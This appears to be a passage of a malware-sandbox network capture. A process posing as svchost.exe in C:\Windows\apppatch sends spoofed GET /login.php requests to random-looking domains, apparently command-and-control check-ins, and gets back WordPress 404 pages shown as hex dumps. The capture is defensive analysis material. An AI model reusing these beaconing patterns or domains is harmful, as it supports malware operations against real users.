                                                                                                                                                                                                                  2024-11-11 17:50:36 UTC1369INData Raw: 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21
                                                                                                                                                                                                                  Data Ascii: ttom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.649770188.114.97.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:37 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1096INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:38 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="45.8",amp_style_sanitizer;dur="18.6",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="19.7"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKoFbtd2QxUv1zO9bYiKeRCTkKH2L7p3ZhRGl0rXNi%2FQ%2FXulD5iSPj5r%2Bj2Z0%2BKk%2FI3bw%2FHUeuyaiPjCVTKAg3Z7RksY4lz8CPZZOR1rHqdd4Utbu%2FR1h5SbEZHvEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102029ddc80f7d-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2260733&cwnd=251&unsent_bytes=0&cid=b9c91602b0989451&ts=1592&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC273INData Raw: 37 63 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                                  Data Ascii: 7c16<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65
                                                                                                                                                                                                                  Data Ascii: ta charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{he
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68
                                                                                                                                                                                                                  Data Ascii: -scrolling:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-ligh
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73
                                                                                                                                                                                                                  Data Ascii: width:100%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:firs
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f
                                                                                                                                                                                                                  Data Ascii: .i-amphtml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-blo
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74
                                                                                                                                                                                                                  Data Ascii: {display:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolut
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e
                                                                                                                                                                                                                  Data Ascii: tbuilt:not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.
                                                                                                                                                                                                                  2024-11-11 17:50:38 UTC1369INData Raw: 74 3b 62 6f 74 74 6f 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                                                                                                                                  Data Ascii: t;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.654645188.114.96.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:49 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDqhFSckBbMMdt1%2Bi4C%2FqqQT7kNz4hBElXo2xCReegjuNyLnNPmKUuEkivTFKU5ay7HyVs6snzcpqD4EcqTCe9278BHYCA04YUV%2FG71W4PY%2BNij7YhvNA8hF0dFFcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10207558b76ac9-BOS
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6915&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=415197&cwnd=32&unsent_bytes=0&cid=a4bbf1a6f1330493&ts=834&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC422INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                                  Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                                                                                                                                                  Data Ascii: e><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta proper
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69
                                                                                                                                                                                                                  Data Ascii: c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.wi
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73
                                                                                                                                                                                                                  Data Ascii: =typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69
                                                                                                                                                                                                                  Data Ascii: atemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/mai
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69
                                                                                                                                                                                                                  Data Ascii: escription{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-wei
                                                                                                                                                                                                                  2024-11-11 17:50:49 UTC1369INData Raw: 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63
